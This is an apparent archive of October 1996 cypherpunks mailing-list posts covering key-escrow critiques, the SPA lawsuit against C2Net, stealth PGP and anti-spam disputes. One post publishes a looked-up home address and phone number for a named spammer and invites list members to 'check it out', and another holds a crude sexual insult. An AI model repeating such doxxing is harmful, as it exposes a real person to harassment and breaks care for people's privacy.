> :...Paul
> 
> 
> Well, Paul, obviously you do. Otherwise why try to justify some thinly
> disguised pseudo-scientific mumbo jumbo as "a commentary on the sad state of
> scientific practice."

No, I don't. I've heard it all before. I'm not interested in what you or 
anyone else believes from a religious point of view - with regards to 
this list. That's your business. What I object to is the automatic pigeon 
holing that takes place the minute someone openly questions the religion 
of scientific method. Suddenly one's percieved personal beliefs come 
under negative scrutiny with the presumption that the accusor need not 
answer to the same - because they are defending truth, honor and the 
faith. Historically, it used to be called the Inquisition.

Pseudo-scientific? in what regards? Is Geophysics pseudo-scientific? Is 
geology pseudo-scientific? I've been paid well to persue seismic studies, 
plus other geological persuits under both categories for several years, so 
I think I can argue the venue on the merits of accepted operation without 
having to drag religion into it. Secondly, having some passing familiarity w
ith Alan Olsen's background, I am not aware of any paid or unpaid 
experience in these fields of expertise.

> 
> As Alan said, "I suggest you take your beliefs to talk.origins."
> 

No thankyou. Take this private if you want to persue it further. 

> BTW, what DOES this have to do with crypto, or privacy, or personal
> freedoms, or MORMONS for that matter?
> 

Crypto - in an oblique manner, it hints at the blinders scientists can 
unwittingly place upon themselves in persuit of a goal - especially when 
that goal involves tenure. Publish or perish. Instituitonal offerings 
many times can be inferior to private persuits for just that reason alone.

privacy  - this is what's at stake every time you use crypto. Can you 
trust your tools?

personal freedoms - a broad issue that covers much more than just crypto. 
How much history do you know? That more than anything else will determine 
how willing you are to fight for your freedoms, and how fast you will be 
willing to give them up.

Mormons - nothing.

....Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 14 Oct 1996 12:03:08 -0700 (PDT)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Blinded Identities [was Re: exporting signatures only/CAPI]
Message-ID: <199610141859.LAA08217@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:01 AM 10/14/96 -0400, Black Unicorn wrote:
>On Sun, 13 Oct 1996, jim bell wrote:
>
>> At 04:28 PM 10/13/96 -0400, Michael Froomkin - U.Miami School of Law wrote:
>> >It is unpublished, but he kindly allowed to me describe it in a paper I
>> >wrote that discussed whether a bank would ever want to take the risk of
>> >allowing bank accounts where it did not know the identity of the customer.
>
>> And I don't think that a bank can ever be embarrassed (assuming bank 
>> accounts are anonymous) by it being revealed that some particular bad guy 
>> kept his money there, any more than other cash-based (anonymous) businesses 
>> are embarrassed if it is revealed that some bad guy used their services.
>
>I would refer you to Union Bank of Switzerland in the late 80's
>(kidnapping), BCCI (drug and intelligence money), BMI (drug
>money/offshore insurance fraud), PNC Bank (accounting fraud), and a host
>of others I won't bother to list.  Banks do suffer from these disclosures,
>in many cases quite severely.  (PNC bank was nearly ruined by their fraud
>harboring disclosures). 

Are you talking about ANONYMOUS accounts, or merely CONFIDENTIAL ones?  
(Anonymous accounts, as I use the term, are ones in which even the bank doesn't 
know the owner.)  I think you're lumping these two things together; I was not.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypherpunks@count04.mry.scruznet.com
Date: Mon, 14 Oct 1996 12:04:01 -0700 (PDT)
To: Tom Lojewski <lojewski@switzerland-c.it.earthlink.net>
Subject: Re: L.Detwieler
In-Reply-To: <1.5.4.32.19961014013918.0071c920@mail.earthlink.net>
Message-ID: <199610141907.MAA03847@count04.mry.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


why are you spamming the list???

    cheers... a cypherpunk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 14 Oct 1996 14:22:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NEWS] Crypto/privacy related wire clippings (per Bill Stewart's request)
Message-ID: <PPusVD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


CITIBANK MINES DATA--MARKETING GOALS WARRANT PARALLEL PROCESSING
Citibank wants to do more than track its credit-card holders' buying behavior.
Soon, it hopes to know what they'll purchase next, and who's committing fraud.
Data-mining techniques and data warehouses, part of a project called the Cards
Analytical Model (CAM) slated to be completed by the end of 1997, are the
tools Citicorp Credit Services in Long Island City, N.Y., hopes to use to
predict future consumer patterns. To make CAM work, Citibank's IS team knew it
needed a powerful mainframe-class system to handle the complex formulas and
algorithms pounding away on close to 2 terabytes of data. But the mainframe
wasn't an option. "We didn't want the data warehouse to impact our OLTP
(online transaction processing) production," says Kevin Murphy, VP of IS for
Citicorp Credit Services. "We didn't have the luxury to give up cycles and
drives." Instead, Citicorp chose the IBM RS/6000 SP MPP (massively parallel
processing), consisting of 116 nodes (or processors) and 7 terabytes of
storage capacity. The database is DB2 Parallel Edition, also from IBM. More
than 50 C++ and C developers, from Citicorp and Lockheed Martin, the systems
integrator, are working on the CAM project.
-- Information Week, 10/07/96

American Banker: Wednesday, October 9, 1996

Card Frontiers

Citi Alumna's Consultancy to Focus on New Technologies

By Jeffrey Kutler

Catherine Allen, the former Citibank vice president and founding chairman of
the Smart Card Forum, announced the formation of a consulting partnership, the
Santa Fe Group.

She is president and chief executive officer of the firm. Former Citibank
technologist Ted Fine and entrepreneur Howard Sherman, who helped develop the
Midas and SuperCuts franchise operations, are executive vice presidents.

The aim is to help businesses understand and assimilate innovations in
management and technology. The firm's base, New Mexico's capital city, is a
hotbed of the study of complex adaptive systems, a scientific discipline that
is crossing over into business management.

Ms. Allen said she hopes to "break new ground by applying complexity theory to
practical business challenges." She has scheduled a forum, "Complexity and
Technology: Organizing for Innovation," in early November.

Mr. Fine, who managed Citibank's global consumer systems, said the firm could
help "master the challenge" of emerging technologies like the Internet and
smart cards.

Ms. Allen had been developing the business since she left Citibank early this
year. Santa Fe Group has been working on several consulting assignments, but
didn't begin widely advertising its services until mid-September.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Mon, 14 Oct 1996 05:47:22 -0700 (PDT)
To: peter.allan@aeat.co.uk
Subject: Re: Binding Cryptography - a fraud-det...
Message-ID: <9610141247.AA19937@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



 
       
1)  What's in it for the user ?

    A voluntary scheme that offers nothing for the user won't be used.

    A compulsory scheme gains nothing for anyone (to be shown later).

    Even standardisation for its own sake (making it popular for being
    popular, regardless of merit) won't do much.  DOS and driving on the
    right are not universal.

2)  What happens when the Feds recover meaningless data ?

    You could ban unrecognised data, with sampling by a TRP.
    You mean I'm called to the Police Station to explain my .qfx file ?
       
3)  Are you going to ban all messages that might contain stego-data ?

    Ban here means flag as "session keys may differ".

4)  How will you detect and punish gangs who share a private key ?


  > Eric Verheul  [everheul@mail.rijnhaave.nl]
    
     Hal Finney[SMTP:hal@rain.org] wrote:
     >Another flaw with schemes of this time (in terms of failing to meet
     >their goals) is that they cannot detect superencryption and other
     >forms of non-standard encryption of the message body proper.  All
     >they can really do is verify from the outside that the same session
     >key is encrypted for the two recipients (the intended recipient and
     >the Government Access to Keys Party - let's not abuse the term by
     >calling him a Trusted Third Party).  But they can't be sure that the
     >session key is sufficient information to decrypt the message.

  > We offered a solution for the *first* task not for the *second*; the
  > point is that criminals(!) do not gain any real advantage from using
  > the system in that way as they - among other things - still face the
  > key-management problem. The above discussions are only relevant in
  > countries where the use of crypto outside the structure would be
  > prohibited. BTW, it is by such discussions that I believe such a ban
  > is ineffective and in fact counterproductive.

I'm still puzzled as to what the point of the scheme is if
   other encryption is legal
or other encryption is undetectable.
It makes as much sense as a law against successful unaided suicide.


Here are 2 suggested solutions to the criminals' key management problem
allowing them to exploit Binding Cryptography.


Plan 1)

Ronald wishes to send a secret message to Margaret via a BC scheme.

He first chooses a session key and encrypts his message with it.
He hides the message in a stego file and signs it.

The session key he chose he now encrypts (ElGamal) with Margaret's pubkey.
He decrypts this with his own privkey to get a different session key.  Call this S.
(Cheats who trust each other could share a keypair so the message will not
appear to go to himself.)

He encrypts the signed stegofile with key S and sends it to himself
and Margaret and a few TRPs.

All observers agree the session key S was used all round.
The message even looks innocent if sampled by the TRP.

The stegocontent is only readable by Margaret's privkey
(reading the key-to-Ronald field).

This can be beaten by enforcing a random session key as opposed
to a derived one.  Make S be the output of a hash for which Ronald
proves in ZK that he knows the input.
(It is not clear from your description that you do this.)



Plan 2)


Use signed stego.

Base key exchange on Diffie-Hellman with the first cyphertext variable 
in the ElGamal scheme.   G=g**k

Or base key exchange on something internal to the stego, as desired.


Get half-baked politicians to see GAK isn't a vote winner and only
wastes money.  Unicorn says convincing government is impossible, but
if they care about nothing else, they listen for where the votes are.

Anyone wanting to find GAK-neutral work to think about could follow
a few of the IETF's working groups.  Why make something obnoxious ?


Peter Allan   peter.allan@aeat.co.uk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Mon, 14 Oct 1996 14:40:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Service pays users (sort of) to read commercial e-mail
Message-ID: <3.0b28.32.19961014144942.006a7e88@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain



>From time to time we've discussed the economics of paying per-message costs
for E-mail, and/or systems where advertisers pay users to read their
messages. Someone seems to have set up a system like that. It's at
<http://www.aristotle.org>. They seem to be using voter registration as an
is-a-real-person credential. (Their idea seems to be that they'll charge
commercial (paper) mailers less than it costs to print & mail junk mail,
deliver it (and some of the $) to users, and keep the remainder of the $
themselves. They seem to be sensitive about "reading things you're not
really interested in", which strikes me as amusing, given all of the crap
that people seem to mail me without special regard for whether or not it's
interesting. Advertisers seem happy enough to spend $.40 to mail me their
stuff, so what's the harm in spending $.30 where I get $.10 of it,
regardless of whether or not I ignore it as quickly as I do paper junk
mail? They're saving $.10, and I'm making $.10, and we're not wasting
paper. Who's being harmed? 

As I read their terms & conditions, they don't start paying you until Dec
1997, and you need to accumulate $100 worth of credit to get paid. Also, it
only seems to be interested in people from California at the moment.
(perhaps that's the only state they've got voter info on so far.) 

--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 14 Oct 1996 08:42:10 -0700 (PDT)
To: "Jim 'AP' Bell" <cypherpunks@toad.com>
Subject: Stick to what you know
In-Reply-To: <Pine.SUN.3.94.961014035114.28315K-100000@polaris>
Message-ID: <199610141631.KAA20157@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.SUN.3.94.961014035114.28315K-100000@polaris>, on 10/14/96 
   at 04:01 AM, Black Unicorn <unicorn@schloss.li> said:

-.On Sun, 13 Oct 1996, jim bell wrote:
-.
        [drivel deleted]
-.> 
-.> Jim Bell
-.> jimbell@pacifier.com
-.> 

-.      [meat deleted...]
-.
-.I know it's a lot to ask, but please stick to areas you know please, rather
-.than making up facts to support your arguments.

        yes, Jim, there is a Santa Claus, but not every situation can
    be solved by AP, not even the long arm of a corrupt law.

--
 "We don't want to get our butts kicked 
    by a bunch of long-haired 26-year-olds with earrings." 
        --General John Sheehan on their reasons for InfoWar involvement






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@xs4all.nl>
Date: Mon, 14 Oct 1996 06:50:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: AW: Binding cryptography - a fraud!
Message-ID: <199610141350.PAA19087@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Eric Verheul sez:
[..]
: I agree to some extend that our system could be used in a totalitarian country, to make
: certain censorship possible. On the other hand, it doesn't make their job especially easy:
: they can forbid and control any type of "strange" data, i.e. encrypted data. One could
: argue that our system at least gives security between citizens. 

: The whole problem is that you don't trust your government, well I do (till some
: extend). I get the impression that this is a typical USA problem.

Which part of the 'IRT enquete' made you trust our government ?

: Eric 


-AJ-
--
" The way to combat noxious ideas is with other ideas.  
  The way to combat falsehoods is with truth. " 
	-- Justice William O. Douglas, 1958




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "'Mark' M.J. Saarelainen" <mjsus@ix.netcom.com>
Date: Mon, 14 Oct 1996 13:24:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: SURVEY: Encryption in Commercial Enterprises
Message-ID: <2.2.16.19961014201727.56d74b26@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Receiver,

I am completing a brief survey of encryption technologies and the uses of
this technology in commercial enterprises. I have included three questions
below. After reviewing these short questions, I would appreciate greatly, if
you could provide your input (your responses) to me. My email address is
mjsus@ix.netcom.com - thanks in advance.

Best regards,

Mark

---------

1. In your opinion, what are the 5-10 most significant applications of
encryption technologies currently in commercial enterprises?

2. In your opinion, what are 5-10  main barriers currently that may prevent
the successful implementation and utilization of encryption technologies in
commercial enterprises?

3. What are activities and projects that can be initiated and taken to lower
and reduce above barriers (see the question 2.)?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 14 Oct 1996 13:24:15 -0700 (PDT)
To: roy@scytale.com
Subject: Re: Fuck Cyberpromo
In-Reply-To: <961013.201053.7B3.rnr.w165w@sendai.scytale.com>
Message-ID: <Pine.SUN.3.91.961014162411.22818G-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 13 Oct 1996, Roy M. Silvernail wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In list.cypherpunks, richieb@teleport.com writes:
> 
> > At 11:07 AM 10/13/96 CST, roy@scytale.com wrote:
> > [snip]
> >
> >>Anyone on the list know of a good, heavy-handed collection agency that
> >>would like to take this when it tops, say, $500?
> >
> > Why not just filter the shit?
> 
> Can't filter until the traffic is delivered to the local system here.
> By that time, I've already paid for its delivery.  Wallace and
> CyberPromo are costing me real, measurable money, and I want it stopped.
> 
> Besides, it will be a valuable precedent if I can collect (or even
> obtain a judgement).  This is right in line with the junk fax law, which
> recognized that junk faxes consume the receiver's resources without
> permission or compensation.

I'd like to join you on this.  I have sent email to 
wallace@asswipespamnet already as well as left them voice mail for every 
message they sent, they will be charged $500 per message and the next one 
I receive constitutes acceptance.  I've since then recieved about 4-5 
more, which means they owe me $2000 or thereabouts. :)

So what steps do we need in putting some teeth into this?

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |  God of pretzles!" |AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Filacchione <alexf@iss.net>
Date: Mon, 14 Oct 1996 13:43:14 -0700 (PDT)
To: "'dlv@bwalk.dm.com>
Subject: RE: LET'S MEET DIMITRI (WHO CARES?)
Message-ID: <01BBB9EE.A19A0040@alexf.iss.net>
MIME-Version: 1.0
Content-Type: text/plain


<FLAME>

Hmm.  Maybe I am missing something.  Can someone please explain to me 
exactly WHAT relevance this has to the list?

People, I really DON'T CARE what your opinions are of Tim May, or anyone 
else for that matter!!!  Can you please stop acting like children in a 
playground name-calling contest and move on to something else?  Something 
of relevance to the list please?  If you absolutely *HAVE* to continue to 
act like children then take it to private email.  If for nothing else, then 
to save YOURSELVES from embarrassment.

</FLAME>

Thank you,

AlexF@iss.net




----------
From: 	Dr.Dimitri Vulis KOTM[SMTP:dlv@bwalk.dm.com]
Sent: 	Friday, October 11, 1996 8:55 AM
To: 	cypherpunks@toad.com
Subject: 	Re: LET'S MEET DIMITRI

[snip]

No deal, then. I suggest that for your next meeting you book Timmy May to
perform live sex acts on stage with his two cats, as Ray and Zach do the
Macarena circle-jerk.

> How about you and Tim sit down and *NICELY* talk about your differences? 









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "'Mark' M.J. Saarelainen" <mjsus@ix.netcom.com>
Date: Mon, 14 Oct 1996 14:28:35 -0700 (PDT)
To: cypherpunks@toad.com
Subject: SURVEY: Encryption in Commercial Enterprises
Message-ID: <2.2.16.19961014212121.2d67399a@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Receiver,

I am completing a brief survey of encryption technologies and the uses of
this technology in commercial enterprises. I have included three questions
below. After reviewing these short questions, I would appreciate greatly, if
you could provide your input (your responses) to me. My email address is
mjsus@ix.netcom.com - thanks in advance.

Best regards,

Mark

---------

1. In your opinion, what are the 5-10 most significant applications of
encryption technologies currently in commercial enterprises?

2. In your opinion, what are 5-10  main barriers currently that may prevent
the successful implementation and utilization of encryption technologies in
commercial enterprises?

3. What are activities and projects that can be initiated and taken to lower
and reduce above barriers (see the question 2.)?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Douglas Barnes <cman@c2.net>
Date: Mon, 14 Oct 1996 17:22:28 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: SPA sues C2, other ISPs and users
Message-ID: <2.2.32.19961015002121.00a3476c@mail.c2.net>
MIME-Version: 1.0
Content-Type: text/plain



I just wanted to weigh in on a couple of points that have
been raised with respect to the SPA lawsuit against C2Net:

1) I don't think this is some sort of evil plot by SPA members
   because we hadn't joined or because we're competing with
   some of their members. A lot of their members compete with
   other members and non-members and nothing like this has 
   happened before. It's pretty clear that they were oblivous to a 
   great many things, including the fact that we're primarily
   a software company these days.

2) As obnoxious as the lawsuit is, we don't miss the humor in
   the fact that we've been grumbling (on-line and off) about 
   folks who pirate Stronghold (our commercial, secure version
   of the Apache web server). We really were looking into 
   joining the SPA, to see if it would do us any good in dealing 
   with this problem.

3) If you run across any mention of this lawsuit in the media,
   either on-line or in print, it would be great if you could
   forward it to me at cman@c2.net, or fax it to me at:
   510 986 8777. I want to be tracking the press coverage
   very closely, and our clipping services takes about 5-10
   days to read and process clippings for us.

Thanks for your help,

Douglas Barnes
VP Sales & Marketing
C2Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Mon, 14 Oct 1996 15:31:12 -0700 (PDT)
To: sameer@c2.net
Subject: Re: COMMUNITY CONNEXION SUED IN FRIVOLOUS LAWSUIT
In-Reply-To: <199610141819.LAA28460@atropos.c2.org>
Message-ID: <Pine.OSF.3.91.961014172802.9012A-100000@francis.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



This smells of extortion if I'm not mistaken. Sign this or I'll sue.

Dan


On Mon, 14 Oct 1996 sameer@c2.net wrote:

> 	    COMMUNITY CONNEXION SUED IN FRIVOLOUS LAWSUIT
> 
> For release: October 14, 1996
> Contact: Sameer Parekh 510-986-8770
> 
> Oakland, CA - Community ConneXion, Inc, dba C2Net, condemns the
> lawsuit served by Adobe Systems, Inc., Claris Corporation, and




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Alexander <jaalexan@netca.com>
Date: Mon, 14 Oct 1996 14:19:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <3262B123.36E2@netca.com>
MIME-Version: 1.0
Content-Type: text/plain








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Mon, 14 Oct 1996 18:00:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: COMMUNITY CONNEXION SUED IN FRIVOLOUS LAWSUIT
In-Reply-To: <Pine.OSF.3.91.961014172802.9012A-100000@francis.tenet.edu>
Message-ID: <m2ran1jay3.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Dan" == Dan Harmon <harmon@tenet.edu> writes:

Dan> This smells of extortion if I'm not mistaken. Sign this or I'll
Dan> sue.

The SPA's Code of Conduct speaks for itself.  See:

	http://www.spa.org/piracy/CODE.htm

Some fair use excerpts:

   ...
   The Code of Conduct does not exempt or limit service
   providers from liability, but rather provides moral commitment to
   practices encouraged by current law.


                            ISP Code of Conduct
    ...
    3. Implement self-monitoring procedures to deter infringement of
       copyright from occurring on the system, including but not limited
       to (a) the unauthorized reproduction and/or distribution of
       copyrighted computer programs, (b) the posting of serial numbers,
       cracker utilities or any other information that can be used to
       circumvent manufacturer-installed copy-protect devices in computer
       programs (hereinafter "cracker information"), and/or (c) the
       linking of sites containing pirated computer programs and/or
       cracker information;
    ...
    8. Do not sponsor, endorse, or advertise access to infringing
       software.

-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be billed at $250/message.
What are the last two letters of "doesn't" and "can't"?
Coincidence?  I think not.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Mon, 14 Oct 1996 18:26:00 -0700 (PDT)
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: crypto wish list (was Re: A "RIGHT" to strong crypto?)
Message-ID: <v02130500ae8830318248@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>> Where is a fully functional and secure "stealth PGP"?
>
>PGP stealth 2.01 beta is at: http://www.dcs.ex.ac.uk/~aba/stealth/
>
>It is not release quality.
>
>I've been meaning to fix that for a while now, a release version will
>be out RSN.
>
>Do you, or anyone else who is interested see any advantage in having
>stealth functionality integrated into PGP, say as a patch for PGP263i
>/ mit PGP262?  Not that hard to do, if there's any interest for it to
>be integrated.
>
>Zbigniew Fiedorowicz <fiedorow@math.mps.ohio-state.edu> added stealth
>and SHA1 support directly to a MAC version of PGP.  The key words `fat
>mac pgp' in a www search engine would probably find it.  Or `Zbigniew
>pgp'?

Best to use <http://128.146.111.31/~fiedorow/PGP/#sha1>

>
>> Where are anonymous and encrypted WWW clients and hosts which permit
>> chaining?
>
>Folks working on this?

The only person I know of to announce such a project was Ray Cromwell. His
Decense project was discussed on this list briefly in February.  I believe
the source is still posted at <http://www.clark.net/pub/rjc/decense.html>.
I've tried to contact Ray to get an up date on progress, but without
results.

The shortcoming of Ray's approach is that it requires intermediate servers
to re-route all client-server packets and therefore someone must provide
that, considerable, bandwidth for free or fee.

If someone were to set up a real-time BlackNet it could provide a superset
of Decense and also offer considerably improved anonymity.  I've heard some
months ago that such a project is under consideration.



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   |
Sacred Cow Meat Co.       |
---------------------------------------------------------------------

Counter-cultural technology development our specialty.

Vote Libertarian.

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon Stevens" <jon@aggroup.com>
Date: Mon, 14 Oct 1996 18:20:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Anybody live in PA?
Message-ID: <9610141831.AA25060@jon.clearink.com>
MIME-Version: 1.0
Content-Type: text/plain


> Cyber Promotions Inc (CYBERPROMO-DOM)
>    8001 Castor Avenue, Suite 127
>    Philadelphia, PA 19152
>    USA
>    Domain Name: CYBERPROMO.COM
>
>    Administrative Contact, Technical Contact, Zone Contact,
>    Billing Contact:
>       Wallace, Sanford  (SW430)  cyberpr@ANSWERME.COM (215) 288-9230

a quick look at four11.com produces...

http://www.four11.com/cgi-bin/Four11Main?userdetail&FormId=,
201,1E8FCAC,3954100,CA43E71_203,2,3954100,74D46FE0

which then produces...

http://www.four11.com/cgi-bin/SledMain?Four11Phone=&Target
=Detail&FirstName=SANFORD&LastName=WALLACE&Address=&
City=PHILADELPHIA&State=PA&Id=532793131&FormId=203,2,3954100,74D46F
E0

which is:

Sanford Wallace
1255 Passmore St
Philadelphia, Pennsylvania 19111
(215)288-8110

maybe a home address/phone number?

someone in PA wanna check it out????

p.s. looks like cyber-promo.com is on hold...

Cyber Promotions (CYBER-PROMO-DOM)
   8001 Castor Avenue, Suite 127
   Philadelphia, PA  19152
   Domain Name: CYBER-PROMO.COM
   Domain Status: On Hold

   Administrative Contact, Technical Contact, Zone Contact:
      Wallace, Sanford  (SW430)  cyberpr@ANSWERME.COM
      (215) 288-9230

-jon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Mon, 14 Oct 1996 17:42:27 -0700 (PDT)
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
In-Reply-To: <Pine.SUN.3.94.961014075619.7731B-100000@polaris>
Message-ID: <961014.190532.7u9.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, unicorn@schloss.li writes:

> Any idea what the basis for refusing "debit" cards is?

None whatsoever.

> I've heard that one concern is that debit cards will often not hold a high
> enough balance to be used as a security deposit.
> How this applies in terms of rental cars is a bit beyond me.

Me, either.  Perhaps this rental agency has had a rash of chargebacks?
The strange part is, when the car gets rented they don't run a charge
authorization, just check if the card's valid.  (if they did run a
validation, mine would have bounced because the Visa card they would
accept was quite full)
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMmLVzhvikii9febJAQHlqQP+Jo4jFXkUfjZu08C4O7EpjWvo59Jz47Dv
f4OnGVMyWPC3OKWS46YDbYw6SnKIZUCTSWEAsBSNlaJpfkSoFuRM7KKs1nBMpoC2
GFc6rqHmOtzojBASKGHtb1wExi2FDglIzfPmLuvxWTMr6dkIGojclnpbrFAv0WPo
e0A20RgbGCE=
=72gI
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 14 Oct 1996 19:09:43 -0700 (PDT)
To: Ray Arachelian <sunder@brainlink.com>
Subject: Re: Fuck Cyberpromo
Message-ID: <199610150209.TAA27055@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:26 PM 10/14/96 -0400, Ray Arachelian wrote:
>On Sun, 13 Oct 1996, Roy M. Silvernail wrote:

>
>I'd like to join you on this.  I have sent email to 
>wallace@asswipespamnet already as well as left them voice mail for every 
>message they sent, they will be charged $500 per message and the next one 
>I receive constitutes acceptance.  I've since then recieved about 4-5 
>more, which means they owe me $2000 or thereabouts. :)
>
>So what steps do we need in putting some teeth into this?

"You rang, Sir?"


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Mon, 14 Oct 1996 18:02:14 -0700 (PDT)
To: tcmay@got.net (Timothy C. May)
Subject: Re: Fuck Cyberpromo
In-Reply-To: <v03007800ae88444f9194@[207.167.93.63]>
Message-ID: <961014.190846.2c3.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, tcmay@got.net writes:

>>Anyone on the list know of a good, heavy-handed collection agency that
>>would like to take this when it tops, say, $500?
>
> What contract do you have with savetrees.com that allows you to invoice
> them? Do you have a Purchase Order number?

I have records of three warnings to discontinue sending robotic email
harrassments.  I think that 3 instances of "send no mail whatsoever to
the domains of scytale.com and cybrspc.mn.org" carries some weight.

> While I certainly am equally annoyed with their crap, I am also annoyed by
> all sorts of "unwanted mail" I receive. Including unwanted _physical_ mail.

Unwanted physical mail doesn't cost me money to receive.  Unwanted
email, on the other hand, carries a real and calculable cost.  I don't
have flat rate access to a POP mailbox.  I have UUCP mail forwarding for
my 2 domains, carrying hourly connect fees.  How does this differ from
the cost of consumable fax machine supplies?

> The "junk fax" law was carefully crafted to cover only continuing,
> persistent, and extensive abuse of fax machines....and I'm not even sure it
> would stand up in court (lawyers may have a clearer idea).

[...]

> And it is not written to cover e-mail, of course.

IANAL, but at least one interpretation I've read finds a computer, modem and
printer equivalent to a fax machine.  And CyberPromo's mail campaign is
"continuing, persistent, and extensive", given that the messages persist
in the face of no less than 8 demands that they cease.

> Also, there's the risk of a _countersuit_ if an "official-looking" invoice
> is sent to a company. Why? Turns out that a scam that is spreading is the
> invoicing of companies for supplies and services never actually
> provided....

The invoices I send clearly state that the charges are handling fees for
harrassing email, and include dates and message id's.  I'm not invoicing
for copier toner or light bulbs.  I'm keeping copies of the
harrassments, as well.  Therefore, I'm charging for a service actually
provided: that of handling the harrassment.  Let him sue.

> Until "junk e-mail" laws are passed (not that I support them, by the way),
> not much can be done.
>
> A precedent-setting case would of course cost a lot of money to follow
> through on.

True enough, but I'm going to do what I can.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

